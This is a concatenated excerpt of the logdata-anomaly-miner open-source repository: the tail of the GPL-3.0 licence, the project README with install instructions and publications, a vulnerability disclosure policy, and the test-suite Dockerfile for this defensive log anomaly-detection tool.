or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . logdata-anomaly-miner-2.6.1/README.md000066400000000000000000000122231437606560100171700ustar00rootroot00000000000000# logdata-anomaly-miner [![Build Status](https://aecidjenkins.ait.ac.at/buildStatus/icon?job=AECID%2FAECID%2Flogdata-anomaly-miner%2Fmain)]( "https://aecidjenkins.ait.ac.at/job/AECID/job/AECID/job/logdata-anomaly-miner/job/main/") [![DeepSource](https://static.deepsource.io/deepsource-badge-light-mini.svg)](https://deepsource.io/gh/ait-aecid/logdata-anomaly-miner/?ref=repository-badge) This tool parses log data and allows to define analysis pipelines for anomaly detection. It was designed to run the analysis with limited resources and lowest possible permissions to make it suitable for production server use. [![AECID Demo – Anomaly Detection with aminer and Reporting to IBM QRadar](https://img.youtube.com/vi/tL7KiMf8NfE/0.jpg)](https://www.youtube.com/watch?v=tL7KiMf8NfE) ## Requirements In order to install logdata-anomaly-miner a **Linux system** with **python >= 3.6** is required. **Debian-based** distributions are currently recommended. _See [requirements.txt](https://github.com/ait-aecid/logdata-anomaly-miner/requirements.txt) for further module dependencies_ ## Installation ### Debian There are Debian packages for logdata-anomaly-miner in the official Debian/Ubuntu repositories. ``` apt-get update && apt-get install logdata-anomaly-miner ``` ### From source The following command will install the latest stable release: ``` cd $HOME wget https://raw.githubusercontent.com/ait-aecid/logdata-anomaly-miner/main/scripts/aminer_install.sh chmod +x aminer_install.sh ./aminer_install.sh ``` ### Docker For installation with Docker see: [Deployment with Docker](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Deployment-with-Docker) ## Getting started Here are some resources to read in order to get started with configurations: * [Getting started](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Getting-started-(tutorial)) * [Some available configurations](https://github.com/ait-aecid/logdata-anomaly-miner/tree/main/source/root/etc/aminer/) * [Documentation](https://aeciddocs.ait.ac.at/logdata-anomaly-miner/) * [Wiki](https://github.com/ait-aecid/logdata-anomaly-miner/wiki) ## Publications Publications and talks: * Wurzenberger M., Skopik F., Settanni G., Fiedler R. (2018): [AECID: A Self-learning Anomaly Detection Approach Based on Light-weight Log Parser Models](http://www.scitepress.org/DigitalLibrary/Link.aspx?doi=10.5220/0006643003860397). [4th International Conference on Information Systems Security and Privacy (ICISSP 2018)](http://www.icissp.org/), January 22-24, 2018, Funchal, Madeira - Portugal. INSTICC. \[[PDF](https://www.markuswurzenberger.com/wp-content/uploads/2020/05/2018_icissp.pdf)\] * Wurzenberger M., Landauer M., Skopik F., Kastner W. (2019): AECID-PG: [AECID-PG: A Tree-Based Log Parser Generator To Enable Log Analysis](https://ieeexplore.ieee.org/document/8717887). [4th IEEE/IFIP International Workshop on Analytics for Network and Service Management (AnNet 2019)](https://annet2019.moogsoft.com/) in conjunction with the [IFIP/IEEE International Symposium on Integrated Network Management (IM)](https://im2019.ieee-im.org/), April 8, 2019, Washington D.C., USA. IEEE. \[[PDF](https://www.markuswurzenberger.com/wp-content/uploads/2020/05/2019_annet.pdf)\] * Landauer M., Skopik F., Wurzenberger M., Hotwagner W., Rauber A. (2019): [A Framework for Cyber Threat Intelligence Extraction from Raw Log Data](https://ieeexplore.ieee.org/document/9006328). [International Workshop on Big Data Analytics for Cyber Threat Hunting (CyberHunt 2019)](https://securitylab.no/cyberhunt2019/) in conjunction with the [IEEE International Conference on Big Data 2019](http://bigdataieee.org/BigData2019/), December 9-12, 2019, Los Angeles, CA, USA. IEEE. \[[PDF](https://www.markuswurzenberger.com/wp-content/uploads/2020/05/2019_cyberhunt.pdf)\] A complete list of publications can be found at [https://aecid.ait.ac.at/further-information/](https://aecid.ait.ac.at/further-information/). ## Contribution We're happily taking patches and other contributions. Please see the following links for how to get started: * [ How to install a development environment ](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Installing-a-development-environment) * [ Git development workflow ](https://github.com/ait-aecid/logdata-anomaly-miner/wiki/Git-development-workflow) ## Bugs If you encounter any bugs, please create an issue on [Github](https://github.com/ait-aecid/logdata-anomaly-miner/issues). ## Security If you discover any security-related issues read the [SECURITY.md](/SECURITY.md) first and report the issues. ## License [GPL-3.0](LICENSE) ## Financial Support This project received financial support through the research projects CAIS (832345), CIIS (840842), and CISA (850199) in course of the Austrian KIRAS security research programme, the research projects synERGY (855457) and DECEPT (873980) in course of the ICT of the future programme of the Austrian Research Promotion Agency (FFG), the research project PANDORA (SI2.835928) in course of the European Defence Industrial Development Programme (EDIDP), as well as the research projects ECOSSIAN (607577) and GUARD (833456) in course of the European Seventh Framework Programme (FP7) and Horizon 2020. logdata-anomaly-miner-2.6.1/SECURITY.md000066400000000000000000000033741437606560100175110ustar00rootroot00000000000000# Security Policy ## Supported Versions | Version | Supported | | ------- | ------------------ | | 2.x.x | :white_check_mark: | | < 2.0.0 | :x: | ## Reporting a Vulnerability Please email reports about any security related issues you find to aecid@ait.ac.at. This mail is delivered to a small developer team. Your email will be acknowledged within one business day, and you'll receive a more detailed response to your email within 7 days indicating the next steps in handling your report. Please use a descriptive subject line for your report email. After the initial reply to your report, our team will endeavor to keep you informed of the progress being made towards a fix and announcement. In addition, please include the following information along with your report: * Your name and affiliation (if any). * A description of the technical details of the vulnerabilities. It is very important to let us know how we can reproduce your findings. * An explanation who can exploit this vulnerability, and what they gain when doing so -- write an attack scenario. This will help us evaluate your report quickly, especially if the issue is complex. * Whether this vulnerability public or known to third parties. If it is, please provide details. * Whether we could mention your name in the changelogs. Once an issue is reported we use the following disclosure process: * When a report is received, we confirm the issue and determine its severity. * If we know of specific third-party services or software based on logdata-anomaly-miner that require mitigation before publication, those projects will be notified. * Fixes are prepared for the last minor release of the latest major release. * Patch releases are published for all fixed released versions. logdata-anomaly-miner-2.6.1/aecid-testsuite/000077500000000000000000000000001437606560100210055ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/Dockerfile000066400000000000000000000117221437606560100230020ustar00rootroot00000000000000# # PLEASE NOTE THAT YOUR WORKING-DIRECTORY MUST BE THE ROOT OF THIS REPOSITORY # IN ORDER WO BUILD THIS CONTAINER-IMAGE!!! # # Build: # docker build -f aecid-testsuite/Dockerfile -t aecid/logdata-anomaly-miner-testing:latest . # # Use: # docker run -m=2G --rm aecid/logdata-anomaly-miner-testing runUnittests # # Run all tests: # docker run -m=2G --rm aecid/logdata-anomaly-miner-testing ALL # # Run a shell inside the container: # docker run -m=2G -it --rm aecid/logdata-anomaly-miner-testing SHELL # # See: https://github.com/ait-aecid/logdata-anomaly-miner/wiki/How-to-use-the-AECID-testsuite # # Pull base image. FROM debian:bullseye # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y \ python3 \ python3-pip \ python3-pip \ python3-tz \ python3-scipy \ python3-pkg-resources \ python3-setuptools \ python3-dateutil \ python3-six \ python3-scipy \ python3-kafka \ python3-cerberus \ python3-yaml \ python3-pylibacl \ python3-urllib3 \ python3-statsmodels \ libacl1-dev \ postfix \ procps \ mailutils \ sudo \ curl \ vim \ postfix \ openjdk-11-jre \ locales \ locales-all \ rsyslog \ git \ mypy \ wget RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \ sed -i -e 's/# de_AT ISO-8859-1/de_AT ISO-8859-1/' /etc/locale.gen && \ dpkg-reconfigure --frontend=noninteractive locales && \ update-locale LANG=en_US.UTF-8 ENV LANG en_US.UTF-8 ENV LANGUAGE en_US:en ENV LC_ALL en_US.UTF-8 # RUN pip3 install coverage # Copy logdata-anomaly-miner-sources ADD source/root/usr/lib/logdata-anomaly-miner /usr/lib/logdata-anomaly-miner # copy these files instead as symlinks would need absolute paths. ADD source/root/etc/aminer/conf-available/ait-lds/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/generic/* /etc/aminer/conf-enabled/ ADD source/root/etc/aminer/conf-available/ait-lds /etc/aminer/conf-available/ait-lds ADD source/root/etc/aminer/conf-available/generic /etc/aminer/conf-available/generic # Entrypoint-wrapper ADD scripts/aminerwrapper.sh /aminerwrapper.sh # Prepare the system and link all python-modules RUN ln -s /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py /usr/bin/aminerremotecontrol \ && ln -s /usr/lib/logdata-anomaly-miner/aminer.py /usr/bin/aminer \ && chmod 0755 /usr/lib/logdata-anomaly-miner/aminer.py \ && chmod 0755 /usr/lib/logdata-anomaly-miner/aminerremotecontrol.py \ && ln -s /usr/lib/python3/dist-packages/kafka /etc/aminer/conf-enabled/kafka \ && ln -s /usr/lib/python3/dist-packages/cerberus /etc/aminer/conf-enabled/cerberus \ && ln -s /usr/lib/python3/dist-packages/scipy /etc/aminer/conf-enabled/scipy \ && ln -s /usr/lib/python3/dist-packages/numpy /etc/aminer/conf-enabled/numpy \ && ln -s /usr/lib/python3/dist-packages/pkg_resources /etc/aminer/conf-enabled/pkg_resources \ && ln -s /usr/lib/python3/dist-packages/yaml /etc/aminer/conf-enabled/yaml \ && ln -s /usr/lib/python3/dist-packages/pytz /etc/aminer/conf-enabled/pytz \ && ln -s /usr/lib/python3/dist-packages/dateutil /etc/aminer/conf-enabled/dateutil \ && ln -s /usr/lib/python3/dist-packages/six.py /etc/aminer/conf-enabled/six.py \ && ln -s /usr/lib/python3/dist-packages/urllib3 /etc/aminer/conf-enabled/urllib3 \ && ln -s /usr/lib/python3/dist-packages/statsmodels /etc/aminer/conf-enabled/statsmodels \ && useradd -ms /usr/sbin/nologin aminer && mkdir -p /var/lib/aminer/log && chmod 0755 /aminerwrapper.sh \ && chown aminer.aminer -R /var/lib/aminer && chmod 0755 /etc/aminer RUN PACK=$(find /usr/lib/python3/dist-packages -name posix1e.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE # Add config ADD source/root/etc/aminer /etc/aminer # Copy the testsuite ADD aecid-testsuite /home/aminer/aecid-testsuite RUN chown aminer.aminer -R /home/aminer \ && ln -s /usr/lib/logdata-anomaly-miner/aminer /home/aminer/aecid-testsuite/aminer \ && ln -s /etc/aminer/template_config.py /home/aminer/aecid-testsuite/demo/aminer/template_config.py \ && ln -s /etc/aminer/template_config.yml /home/aminer/aecid-testsuite/demo/aminer/template_config.yml \ && chmod +x /home/aminer/aecid-testsuite/*.sh \ && echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer ADD scripts/testingwrapper.sh /testingwrapper.sh ADD source /home/aminer/source ADD docs /home/aminer/docs RUN pip3 install orjson RUN PACK=$(find /usr/local/lib/ -name orjson.cpython\*.so) && FILE=$(echo $PACK | awk -F '/' '{print $NF}') ln -s $PACK /usr/lib/logdata-anomaly-miner/$FILE USER aminer 